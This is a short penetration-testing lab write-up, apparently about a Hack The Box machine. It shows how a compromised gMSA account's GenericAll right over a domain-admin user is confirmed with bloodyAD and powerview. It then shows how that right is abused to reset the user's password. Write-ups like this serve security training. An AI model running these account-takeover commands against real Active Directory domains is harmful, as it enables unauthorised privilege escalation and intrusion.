InfoSec LAB

Search_GenericAll

Created: 2 min read

GenericAll

as discovered during the bloodhound session, the [[search_lateral_movement_bir-adfs-gmsa#bir-adfs-gmsa|compromised]] `bir-adfs-gmsaaccount has [genericall](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericall) privilege over thetristan.davies` user

while there are a lot of ways to compromise the target user from this point as the genericall privilege grants a complete control over the user object, I will first confirm it

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache bloodyAD -d SEARCH.HTB -k --host research.search.htb --secure get object 'CN=Tristan Davies,CN=Users,DC=search,DC=htb' --resolve-sd | grep -i nTSecurityDescriptor.ACL.8      
ntsecuritydescriptor.acl.8.type: == ALLOWED ==
ntsecuritydescriptor.acl.8.trustee: BIR-ADFS-GMSA$; LOCAL_SYSTEM
ntsecuritydescriptor.acl.8.right: GENERIC_ALL
ntsecuritydescriptor.acl.8.objecttype: Self

the 8th acl entry indeed shows the genericall privilege that the BIR-ADFS-GMSA$ account has over the tristan.davies user

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache powerview 'SEARCH.HTB/@research.search.htb' --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity tristan.davies -ResolveGUIDs'                  
[2024-01-31 10:55:51] LDAP Signing NOT Enforced!
 
[...REDACTED...]
 
objectdn                    : CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectsid                   : S-1-5-21-271492789-1610487937-1871574529-1298
acetype                     : ACCESS_ALLOWED_ACE
aceflags                    : None
activedirectoryrights       : FullControl
access mask                 : 0xf01ff
inheritancetype             : None
securityidentifier          : BIR-ADFS-GMSA$ (S-1-5-21-271492789-1610487937-1871574529-1299)
 
[...REDACTED...]

Same result can be seen using powerview

Password Reset

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache bloodyAD -d SEARCH.HTB -k --host research.search.htb --secure set password 'CN=TRISTAN DAVIES,CN=USERS,DC=SEARCH,DC=HTB' 'Qwer!234'
[+] Password changed successfully!

Since full control is granted over the target user object with the GenericAll privilege, I could just change the password of the target user. Resetting the password of the tristan.davies user to Qwer!234 Validation will be made by requesting for a TGT

Additionally, the tristan.davies user is a DA. Moving on to Privilege Escalation phase.

Interactive Graph View

Backlinks